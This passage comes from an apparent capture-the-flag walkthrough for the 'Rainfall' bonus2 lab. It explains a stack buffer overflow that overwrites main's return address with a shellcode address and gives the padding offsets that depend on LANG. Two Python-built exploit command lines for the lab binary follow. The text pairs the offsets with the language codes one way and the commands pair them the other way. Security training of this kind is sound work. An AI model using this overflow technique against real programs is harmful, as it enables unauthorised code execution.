ndormoy/Rainfall/bonus2/walkthrough.md

 0xbffffe93 in little endian = \x93\xfe\xff\xbf

+Now we have our two offset for nl (18) and fi (23)
+So we can overwrite the return address of the main function with the address of the shellcode + 18 or 23.
+We just have to put 40 bytes or more for the first argument, and adjust the second argument depending on the LANG variable.

 ./bonus2 $(python -c 'print "A" * 60') $(python -c 'print "B" * 18 + "\x93\xfe\xff\xbf"')		--> fi
 ./bonus2 $(python -c 'print "A" * 60') $(python -c 'print "B" * 23 + "\x93\xfe\xff\xbf"')		--> nl